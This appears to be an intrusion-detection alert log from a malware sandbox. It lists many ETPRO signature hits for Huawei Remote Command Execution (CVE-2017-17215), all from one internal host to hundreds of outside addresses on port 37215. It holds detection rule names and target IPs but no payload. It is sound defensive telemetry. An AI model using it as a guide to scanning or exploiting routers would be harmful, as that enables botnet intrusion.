                                                        06/13/24-21:31:57.130208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780637215192.168.2.14156.153.229.114
                                                        06/13/24-21:32:01.220803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037637215192.168.2.14197.173.171.143
                                                        06/13/24-21:32:44.457557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835637215192.168.2.14156.50.86.167
                                                        06/13/24-21:33:15.276612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804637215192.168.2.1441.16.217.182
                                                        06/13/24-21:32:15.635102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836437215192.168.2.14197.55.27.50
                                                        06/13/24-21:33:09.088402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174637215192.168.2.14156.19.63.254
                                                        06/13/24-21:32:21.785039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125237215192.168.2.1441.229.50.222
                                                        06/13/24-21:33:09.087409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475237215192.168.2.14156.161.91.229
                                                        06/13/24-21:32:44.457196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.14197.191.219.140
                                                        06/13/24-21:33:07.043010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332437215192.168.2.14197.87.95.98
                                                        06/13/24-21:33:13.231432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453237215192.168.2.14156.94.220.244
                                                        06/13/24-21:32:05.348981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836037215192.168.2.1441.201.18.44
                                                        06/13/24-21:32:38.323897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593637215192.168.2.1441.221.176.5
                                                        06/13/24-21:32:52.657154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509837215192.168.2.14197.137.181.44
                                                        06/13/24-21:32:54.710468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930037215192.168.2.14156.47.227.58
                                                        06/13/24-21:32:23.940658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.14197.234.246.254
                                                        06/13/24-21:32:28.048284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775237215192.168.2.14197.163.234.29
                                                        06/13/24-21:32:56.790323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649037215192.168.2.14197.122.211.89
                                                        06/13/24-21:33:05.017361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311637215192.168.2.14197.14.144.103
                                                        06/13/24-21:32:58.841060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321437215192.168.2.14156.140.148.182
                                                        06/13/24-21:32:50.630013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153637215192.168.2.14197.50.149.81
                                                        06/13/24-21:32:52.657950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537837215192.168.2.14197.73.125.39
                                                        06/13/24-21:33:13.231828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683837215192.168.2.14197.172.29.136
                                                        06/13/24-21:33:00.886379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226437215192.168.2.1441.158.8.207
                                                        06/13/24-21:32:15.611385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194037215192.168.2.14197.167.10.7
                                                        06/13/24-21:32:19.753345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221037215192.168.2.1441.25.175.213
                                                        06/13/24-21:32:50.614795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008237215192.168.2.1441.75.53.131
                                                        06/13/24-21:33:11.158384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519837215192.168.2.14197.143.189.48
                                                        06/13/24-21:33:09.088572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727837215192.168.2.14156.78.122.34
                                                        06/13/24-21:33:15.270943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637637215192.168.2.14197.41.215.12
                                                        06/13/24-21:32:52.657293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555237215192.168.2.14197.99.99.77
                                                        06/13/24-21:32:54.708902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803237215192.168.2.14156.183.156.33
                                                        06/13/24-21:32:28.046095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887237215192.168.2.1441.142.200.46
                                                        06/13/24-21:32:52.656407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304437215192.168.2.14156.22.183.194
                                                        06/13/24-21:32:58.821735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254237215192.168.2.14197.181.110.215
                                                        06/13/24-21:33:15.271774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763437215192.168.2.14197.22.12.15
                                                        06/13/24-21:33:02.908940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135837215192.168.2.14197.216.14.19
                                                        06/13/24-21:31:57.092534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609437215192.168.2.14156.13.57.250
                                                        06/13/24-21:32:17.697487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054437215192.168.2.1441.85.145.113
                                                        06/13/24-21:32:13.545540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417637215192.168.2.14156.94.167.250
                                                        06/13/24-21:32:05.378305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935037215192.168.2.1441.127.165.63
                                                        06/13/24-21:32:56.754451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.14197.216.235.159
                                                        06/13/24-21:32:40.354923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053037215192.168.2.14197.170.241.26
                                                        06/13/24-21:31:57.132791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955837215192.168.2.14197.21.125.189
                                                        06/13/24-21:33:04.989529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683437215192.168.2.14197.109.54.171
                                                        06/13/24-21:33:09.109466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.1441.204.142.242
                                                        06/13/24-21:32:32.166681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088237215192.168.2.1441.39.15.251
                                                        06/13/24-21:32:52.657343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5637037215192.168.2.1441.152.16.65
                                                        06/13/24-21:32:23.940609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176837215192.168.2.14197.28.20.240
                                                        06/13/24-21:32:48.569251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349637215192.168.2.14156.66.241.16
                                                        06/13/24-21:33:11.158199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662837215192.168.2.14197.181.94.121
                                                        06/13/24-21:32:09.438550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975837215192.168.2.14156.209.145.232
                                                        06/13/24-21:33:11.173346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768837215192.168.2.1441.132.92.152
                                                        06/13/24-21:32:56.757866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326437215192.168.2.1441.67.235.193
                                                        06/13/24-21:32:15.609684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554437215192.168.2.1441.115.150.194
                                                        06/13/24-21:32:25.976881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285037215192.168.2.1441.205.50.153
                                                        06/13/24-21:32:01.224723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395437215192.168.2.14197.82.80.162
                                                        06/13/24-21:32:19.730578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570637215192.168.2.1441.182.89.250
                                                        06/13/24-21:32:48.572448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694837215192.168.2.1441.110.154.42
                                                        06/13/24-21:33:02.913860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772437215192.168.2.1441.41.134.34
                                                        06/13/24-21:32:48.568874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844437215192.168.2.14197.171.198.96
                                                        06/13/24-21:32:54.708128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071237215192.168.2.14197.130.231.202
                                                        06/13/24-21:32:07.402759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866437215192.168.2.14156.49.52.185
                                                        06/13/24-21:32:46.527539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626837215192.168.2.1441.86.146.29
                                                        06/13/24-21:32:54.710156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.14156.192.22.118
                                                        06/13/24-21:32:03.279237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068237215192.168.2.14156.66.84.142
                                                        06/13/24-21:32:11.486448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165837215192.168.2.14197.183.8.121
                                                        06/13/24-21:32:19.727874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280037215192.168.2.14156.73.211.196
                                                        06/13/24-21:31:57.137475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795037215192.168.2.14197.112.192.179
                                                        06/13/24-21:32:25.993569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.14156.174.135.213
                                                        06/13/24-21:32:32.164941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389837215192.168.2.14156.13.83.126
                                                        06/13/24-21:32:17.694777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823037215192.168.2.14156.218.179.41
                                                        06/13/24-21:32:19.753799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390437215192.168.2.14197.103.56.20
                                                        06/13/24-21:32:50.610515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755837215192.168.2.1441.50.175.207
                                                        06/13/24-21:31:57.091211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452237215192.168.2.1441.146.71.68
                                                        06/13/24-21:32:54.725647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705637215192.168.2.14197.212.198.249
                                                        06/13/24-21:33:09.107562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3643837215192.168.2.14197.120.45.172
                                                        06/13/24-21:31:59.176171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769037215192.168.2.14156.223.32.71
                                                        06/13/24-21:32:50.613260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068637215192.168.2.14156.196.114.235
                                                        06/13/24-21:32:05.369124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536037215192.168.2.14197.160.109.92
                                                        06/13/24-21:32:11.486507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4977237215192.168.2.1441.235.49.159
                                                        06/13/24-21:32:44.453693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098237215192.168.2.14197.65.253.151
                                                        06/13/24-21:33:00.869450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220437215192.168.2.1441.50.243.107
                                                        06/13/24-21:32:01.248858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055637215192.168.2.1441.73.13.140
                                                        06/13/24-21:33:00.868131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556237215192.168.2.1441.6.14.73
                                                        06/13/24-21:33:07.057906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679237215192.168.2.1441.32.126.116
                                                        06/13/24-21:32:46.510357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030237215192.168.2.1441.11.160.198
                                                        06/13/24-21:32:11.487621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362437215192.168.2.14156.111.233.77
                                                        06/13/24-21:31:59.194674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171037215192.168.2.1441.55.60.186
                                                        06/13/24-21:32:38.318558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993237215192.168.2.14197.212.25.90
                                                        06/13/24-21:33:13.213320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.14197.59.231.48
                                                        06/13/24-21:33:15.272170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757437215192.168.2.1441.118.36.223
                                                        06/13/24-21:33:02.913414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.1441.6.41.18
                                                        06/13/24-21:32:05.370369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639037215192.168.2.14197.153.118.122
                                                        06/13/24-21:33:11.178026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.1441.58.226.196
                                                        06/13/24-21:32:09.458151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577637215192.168.2.14156.138.65.69
                                                        06/13/24-21:32:17.677946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810437215192.168.2.14197.170.121.174
                                                        06/13/24-21:32:21.787934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332037215192.168.2.1441.205.49.23
                                                        06/13/24-21:33:11.178736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439037215192.168.2.14156.118.73.74
                                                        06/13/24-21:32:01.248742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497637215192.168.2.14197.25.21.72
                                                        06/13/24-21:33:02.907928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898637215192.168.2.14156.155.174.148
                                                        06/13/24-21:33:07.055350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871237215192.168.2.14197.80.22.149
                                                        06/13/24-21:33:07.041046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674037215192.168.2.1441.227.139.70
                                                        06/13/24-21:32:40.359128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.14197.119.141.115
                                                        06/13/24-21:32:34.191062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4044237215192.168.2.14197.213.20.186
                                                        06/13/24-21:32:42.406015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.14156.225.34.133
                                                        06/13/24-21:32:58.823899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376037215192.168.2.14197.90.38.8
                                                        06/13/24-21:32:44.453511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620237215192.168.2.14156.8.169.219
                                                        06/13/24-21:32:58.820137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960837215192.168.2.14156.227.148.177
                                                        06/13/24-21:32:36.267003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342237215192.168.2.1441.0.250.189
                                                        06/13/24-21:33:11.160785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292637215192.168.2.14156.221.212.6
                                                        06/13/24-21:32:09.454386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217037215192.168.2.14197.42.196.59
                                                        06/13/24-21:32:03.278817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944037215192.168.2.14156.36.62.71
                                                        06/13/24-21:33:15.269130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856037215192.168.2.1441.57.95.10
                                                        06/13/24-21:32:19.752588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879837215192.168.2.14156.123.93.93
                                                        06/13/24-21:32:23.942264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293837215192.168.2.14197.23.174.62
                                                        06/13/24-21:33:00.871996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369037215192.168.2.14197.207.36.166
                                                        06/13/24-21:31:59.176532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502637215192.168.2.14197.54.176.241
                                                        06/13/24-21:33:02.938097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339037215192.168.2.14156.230.138.134
                                                        06/13/24-21:32:15.636213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597437215192.168.2.1441.17.241.74
                                                        06/13/24-21:32:19.749014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870237215192.168.2.1441.110.143.196
                                                        06/13/24-21:32:40.374887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239837215192.168.2.14197.165.175.211
                                                        06/13/24-21:32:52.678828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446237215192.168.2.14197.179.249.183
                                                        06/13/24-21:32:05.344363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797437215192.168.2.1441.124.255.85
                                                        06/13/24-21:33:04.988032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837237215192.168.2.1441.13.19.96
                                                        06/13/24-21:32:58.819566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589037215192.168.2.1441.185.224.7
                                                        06/13/24-21:32:28.027174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968237215192.168.2.14156.20.156.157
                                                        06/13/24-21:32:13.545751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320637215192.168.2.14197.16.108.122
                                                        06/13/24-21:32:46.525923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276037215192.168.2.14197.213.183.73
                                                        06/13/24-21:32:38.301649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198837215192.168.2.14156.183.82.217
                                                        06/13/24-21:32:28.028104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435037215192.168.2.14197.250.33.219
                                                        06/13/24-21:32:54.709739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.1441.249.86.178
                                                        06/13/24-21:32:38.319987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284837215192.168.2.1441.29.41.250
                                                        06/13/24-21:32:44.453971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203237215192.168.2.1441.163.234.153
                                                        06/13/24-21:32:52.659290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735637215192.168.2.14197.128.12.167
                                                        06/13/24-21:32:23.836409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714437215192.168.2.1441.43.185.10
                                                        06/13/24-21:33:15.253992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757437215192.168.2.14156.239.20.160
                                                        06/13/24-21:32:23.935425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502237215192.168.2.14156.189.229.10
                                                        06/13/24-21:33:13.213421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693637215192.168.2.14156.28.0.162
                                                        06/13/24-21:32:13.564781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730437215192.168.2.1441.209.164.102
                                                        06/13/24-21:32:54.725751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000437215192.168.2.14156.56.22.241
                                                        06/13/24-21:33:15.252279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219437215192.168.2.1441.72.149.249
                                                        06/13/24-21:32:07.401261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.1441.15.247.59
                                                        06/13/24-21:32:25.997108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789437215192.168.2.14197.94.101.36
                                                        06/13/24-21:32:28.046149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983037215192.168.2.14197.198.110.71
                                                        06/13/24-21:32:32.152995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501637215192.168.2.1441.209.195.100
                                                        06/13/24-21:32:21.802157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546037215192.168.2.14156.161.72.81
                                                        06/13/24-21:32:38.317942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923237215192.168.2.14197.23.63.63
                                                        06/13/24-21:33:00.872332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665637215192.168.2.14156.132.101.137
                                                        06/13/24-21:31:57.091932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373037215192.168.2.14197.139.243.135
                                                        06/13/24-21:32:44.452067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093837215192.168.2.14197.133.119.233
                                                        06/13/24-21:32:05.378079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499837215192.168.2.14156.239.85.79
                                                        06/13/24-21:32:05.369906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931237215192.168.2.1441.245.132.113
                                                        06/13/24-21:33:07.042813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242437215192.168.2.14156.181.212.47
                                                        06/13/24-21:33:17.307304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000837215192.168.2.14197.199.126.118
                                                        06/13/24-21:32:30.094733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597037215192.168.2.14156.111.248.106
                                                        06/13/24-21:32:34.192314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.1441.196.95.180
                                                        06/13/24-21:32:05.346106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854237215192.168.2.1441.42.231.112
                                                        06/13/24-21:33:02.913308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847437215192.168.2.1441.1.5.122
                                                        06/13/24-21:33:09.128959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483037215192.168.2.14197.154.126.33
                                                        06/13/24-21:33:11.156473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676637215192.168.2.14156.132.204.236
                                                        06/13/24-21:32:28.028466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066037215192.168.2.1441.226.89.188
                                                        06/13/24-21:32:30.127147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200037215192.168.2.14197.206.94.185
                                                        06/13/24-21:32:42.404051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490237215192.168.2.1441.245.0.161
                                                        06/13/24-21:32:17.697434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847637215192.168.2.14197.123.89.8
                                                        06/13/24-21:32:32.166161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771437215192.168.2.1441.3.105.50
                                                        06/13/24-21:32:40.355917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461637215192.168.2.1441.44.203.33
                                                        06/13/24-21:32:54.726758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478637215192.168.2.1441.114.105.165
                                                        06/13/24-21:31:57.092411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590437215192.168.2.14156.243.0.183
                                                        06/13/24-21:32:01.222980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335037215192.168.2.14156.250.205.241
                                                        06/13/24-21:33:13.212998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.1441.157.118.134
                                                        06/13/24-21:32:07.403082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5082637215192.168.2.14197.19.156.91
                                                        06/13/24-21:32:52.678311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084037215192.168.2.14197.232.96.220
                                                        06/13/24-21:32:34.191880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408837215192.168.2.1441.130.237.25
                                                        06/13/24-21:32:32.169062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491037215192.168.2.14156.136.55.213
                                                        06/13/24-21:32:46.526214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975637215192.168.2.1441.105.248.26
                                                        06/13/24-21:33:17.309357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069237215192.168.2.14197.151.140.109
                                                        06/13/24-21:33:04.991362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415637215192.168.2.14156.71.171.197
                                                        06/13/24-21:32:38.303607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532637215192.168.2.14197.109.167.24
                                                        06/13/24-21:32:42.409430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802837215192.168.2.14156.27.140.219
                                                        06/13/24-21:32:48.568688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14197.135.200.51
                                                        06/13/24-21:32:34.195612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616037215192.168.2.14156.231.202.122
                                                        06/13/24-21:32:56.792167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443837215192.168.2.14156.253.246.60
                                                        06/13/24-21:32:58.823265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165037215192.168.2.14197.160.253.44
                                                        06/13/24-21:32:58.839664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684237215192.168.2.1441.147.147.78
